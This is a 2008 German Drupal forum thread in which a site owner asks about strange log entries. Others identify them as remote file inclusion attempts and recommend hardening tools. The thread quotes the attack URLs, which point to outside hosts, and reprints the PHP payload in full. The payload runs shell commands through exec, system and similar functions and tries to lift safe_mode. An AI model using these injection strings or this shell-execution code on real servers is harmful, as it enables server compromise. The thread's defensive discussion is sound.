Ist das harmlos oder ein Versuch, meine Seite zu hacken?
Eingetragen von RC.Otto (73)am 06.03.2008 - 06:50 Uhr in
Hallo,
ich finde in meinen Logs folgenden Aufruf für eine nicht gefundene Seite:
http://www.meinedomain.eu//drupal/?_menu[callbacks][1][callback]=http://heidik.org/canar/cmdaff?
Ich habe nur keine Vorstellung, wer dort was gewollt haben kann. Auch kenne ich diese Domain heidik.org nicht. Ist das ein Versuch, meine Drupalinstallation zu hacken oder ist es harmlos?
Rolf-Christian
- Anmelden oder Registrieren um Kommentare zu schreiben
Ich hab das auch manchmal
am 06.03.2008 - 08:35 Uhr
Ich hab das auch manchmal drin, bisher konnte ich noch keine Nachwirkung beobachten.
----------------------------------------
Alle Angaben ohne Gewähr!!:D
http://www.tobiasbaehr.de/
Spartacus schrieb Ich hab
am 06.03.2008 - 11:36 Uhr
Ich hab das auch manchmal drin, bisher konnte ich noch keine Nachwirkung beobachten.
Spannend. Aber was ist das. Ich habe ja keinen Link zu dieser URL gesetzt. Also muss doch irgendjemand diese Seite manuell aufgerufen haben. Aber wozu?
Rolf-Christian
--
Rolf-Christian Otto
Rechtsanwalt mit dem Schwerpunkt Arbeitsrecht in Kassel.
www: www.bnmp.eu
siehe
am 06.03.2008 - 11:53 Uhr
siehe http://drupal.org/node/184313
Das ist ganz offenslichtlich ein Hackversuch
am 06.03.2008 - 11:59 Uhr
Eine simple Google-Suche führt zu
http://drupal.org/node/184313, wo das erklärt ist.
Zweitens sollten solche Requests mit externen URLs darin immer die
Alarmglocken läuten lassen, da sie i.d.R. ein Anzeichen dafür sind,
dass jemand versucht, remote gelagerten Code einzuschleusen.
Zum Lernen: Schaut Euch doch mal den URL an, der
in den Request reincodiert ist, dann seht Ihr, was da los ist. Und dann schaut
mal ein Verzeichnis höher in
heidik.org/canar/ , da liegt noch anderes nettes Zeug.
Übrigens sollte man in so einem Fall stets prüfen, ob man den Betreiber
der Site, wo der Code abgelegt ist, informiert und auffordert, ihn zu
entfernen. Bei einer offensichtlichen Hackersite wie heidik.org kann man
sich das natürlcih sparen, aber oftmals wird solcher Code ja auf sites
abgelegt, die ihrerseits schon gehackt sind. Da freut sich der Betreiber
über entsprechende Hinweise, und der Exploit wird damit auch hinfällig.
LG,
Ulrich
Nächster Angriff ...
am 07.03.2008 - 10:56 Uhr
Danke für den Hinweis. Ich hatte nur bei drupalcenter.de gesucht und nichts gefunden.
Nun ist noch ein zweiter Versuch gestartet worden, dazu finde ich folgenden Link in meinen Logs: http://www.meinedomain.eu//drupal/?_menu[callbacks][1][callback]=http://pic.azgn.de/brauser/photos/1/61150362/.jpg/test.txt??%20?
Die dort aufgerufene Datei enthält folgenden Code:
Owned by #Romania!<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit;
Register_globals ist bei mir off und ich verwende die aktuelle PHP-Version, so dass kein Schaden eingetreten sein dürfte. Gleichwohl ist es eine Mahnung, sich immer wieder um eine ordentliche Absicherung seiner Installation zu bemühen. Deshalb nochmals ganz herzlichen Dank für den Hinweis!
Rolf-Christian
Vor allem sollte für
am 07.03.2008 - 11:46 Uhr
Vor allem sollte für diejenigen, die einen eigenen Server betreiben der Rat gelten, Suhosin, SuExec, ... und am besten auch ModSecurity einzusetzen.
--
"Look, Ma, I'm dead!"
Cell, Stephen King
als ergänzung
am 16.03.2008 - 18:54 Uhr
Hallo
Habe diese angriffe auch festgestellt.
Ich nutze crawltrack.fr um die Suma Bots zu tracken, netter nebeneffekt ist das Crawltrack auch als zusätztliche Abwehr funktioniert und bekannte Angriffe blockt und mitloggt.
Ich kann Crawltrack jedem empfehlen, der nicht jeden Tag die Logfiles durchsuchen möchten.
Tipp: die zwei Zeilen PHP Skript die eingebaut werden müssen, dürfen nicht gecached werden, wie z.b. mit dem Modul Block Cache.
crawltrack erzeugt keine Ausgabe im Sourcecode und hat auch sonst keine Auswirkungen auf Drupal.
gruss
bennos